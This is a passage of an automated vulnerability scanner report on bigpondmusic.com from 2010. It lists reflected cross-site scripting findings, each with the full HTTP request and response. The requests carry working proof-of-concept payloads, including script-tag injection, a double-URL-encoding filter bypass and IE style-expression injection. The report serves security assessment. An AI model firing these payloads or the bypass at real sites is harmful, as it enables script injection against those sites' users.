<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - Just A Dream - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/just-a-dream2?ba87f"style="x:expression(alert(1))"31c7e4dd0c=1" />
...[SNIP]...

2.108. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6490e'%3b7485f0ca9f5 was submitted in the REST URL parameter 1. This input was echoed as 6490e';7485f0ca9f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album6490e'%3b7485f0ca9f5/nicole-scherzinger/poison4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88121


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album6490e';7485f0ca9f5';
   s.prop4 = 'nicole-scherzinger';
   s.prop5 = 'poison4';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop
...[SNIP]...

2.109. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e279f4e1735f was submitted in the REST URL parameter 1. This input was echoed as c62ff"><script>alert(1)</script>279f4e1735f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc62ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e279f4e1735f/nicole-scherzinger/poison4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88450


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc62ff"><script>alert(1)</script>279f4e1735f/nicole-scherzinger/poison4" />
...[SNIP]...

2.110. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f969"style%3d"x%3aexpression(alert(1))"18b7bf8d52b was submitted in the h parameter. This input was echoed as 5f969"style="x:expression(alert(1))"18b7bf8d52b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nicole-scherzinger/poison4?h=7653777365f969"style%3d"x%3aexpression(alert(1))"18b7bf8d52b HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 99468


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nicole Scherzinger - Poison
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nicole-scherzinger/poison4?h=7653777365f969"style="x:expression(alert(1))"18b7bf8d52b" />
...[SNIP]...

2.111. http://bigpondmusic.com/album/nicole-scherzinger/poison4 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nicole-scherzinger/poison4

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4465f"style%3d"x%3aexpression(alert(1))"01d427eeef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4465f"style="x:expression(alert(1))"01d427eeef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nicole-scherzinger/poison4?4465f"style%3d"x%3aexpression(alert(1))"01d427eeef0=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 99329


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nicole Scherzinger - Poison
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nicole-scherzinger/poison4?4465f"style="x:expression(alert(1))"01d427eeef0=1" />
...[SNIP]...

2.112. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3921'%3b1df4e93a53 was submitted in the REST URL parameter 1. This input was echoed as c3921';1df4e93a53 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc3921'%3b1df4e93a53/p-nk/greatest-hits-so-far HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87896


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc3921';1df4e93a53';
   s.prop4 = 'p-nk';
   s.prop5 = 'greatest-hits-so-far';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.113. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ed0f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50a9fabc3f3 was submitted in the REST URL parameter 1. This input was echoed as 8ed0f"><script>alert(1)</script>50a9fabc3f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album8ed0f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50a9fabc3f3/p-nk/greatest-hits-so-far HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88218


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8ed0f"><script>alert(1)</script>50a9fabc3f3/p-nk/greatest-hits-so-far" />
...[SNIP]...

2.114. http://bigpondmusic.com/album/p-nk/greatest-hits-so-far [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/greatest-hits-so-far

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b739"style%3d"x%3aexpression(alert(1))"0516aff5a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b739"style="x:expression(alert(1))"0516aff5a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/greatest-hits-so-far?2b739"style%3d"x%3aexpression(alert(1))"0516aff5a34=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134007


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Greatest Hits...So Fa
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/greatest-hits-so-far?2b739"style="x:expression(alert(1))"0516aff5a34=1" />
...[SNIP]...

2.115. http://bigpondmusic.com/album/p-nk/raise-your-glass [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b002'%3b2512425bfef was submitted in the REST URL parameter 1. This input was echoed as 7b002';2512425bfef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album7b002'%3b2512425bfef/p-nk/raise-your-glass HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album7b002';2512425bfef';
   s.prop4 = 'p-nk';
   s.prop5 = 'raise-your-glass';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '
...[SNIP]...

2.116. http://bigpondmusic.com/album/p-nk/raise-your-glass [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5901a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5cb7aa2bc8 was submitted in the REST URL parameter 1. This input was echoed as 5901a"><script>alert(1)</script>d5cb7aa2bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album5901a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed5cb7aa2bc8/p-nk/raise-your-glass HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88325


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album5901a"><script>alert(1)</script>d5cb7aa2bc8/p-nk/raise-your-glass" />
...[SNIP]...

2.117. http://bigpondmusic.com/album/p-nk/raise-your-glass [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f36a9"style%3d"x%3aexpression(alert(1))"6ca781435e0 was submitted in the h parameter. This input was echoed as f36a9"style="x:expression(alert(1))"6ca781435e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/raise-your-glass?h=756314040f36a9"style%3d"x%3aexpression(alert(1))"6ca781435e0 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105147


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Raise Your Glass - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/raise-your-glass?h=756314040f36a9"style="x:expression(alert(1))"6ca781435e0" />
...[SNIP]...

2.118. http://bigpondmusic.com/album/p-nk/raise-your-glass [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/p-nk/raise-your-glass

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c4d"style%3d"x%3aexpression(alert(1))"397b8c9825e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9c4d"style="x:expression(alert(1))"397b8c9825e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/p-nk/raise-your-glass?b9c4d"style%3d"x%3aexpression(alert(1))"397b8c9825e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:20:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 104639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>P!Nk - Raise Your Glass - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/p-nk/raise-your-glass?b9c4d"style="x:expression(alert(1))"397b8c9825e=1" />
...[SNIP]...

2.119. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e0a93acac3 was submitted in the REST URL parameter 1. This input was echoed as c0385"><script>alert(1)</script>3e0a93acac3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc0385%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e0a93acac3/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
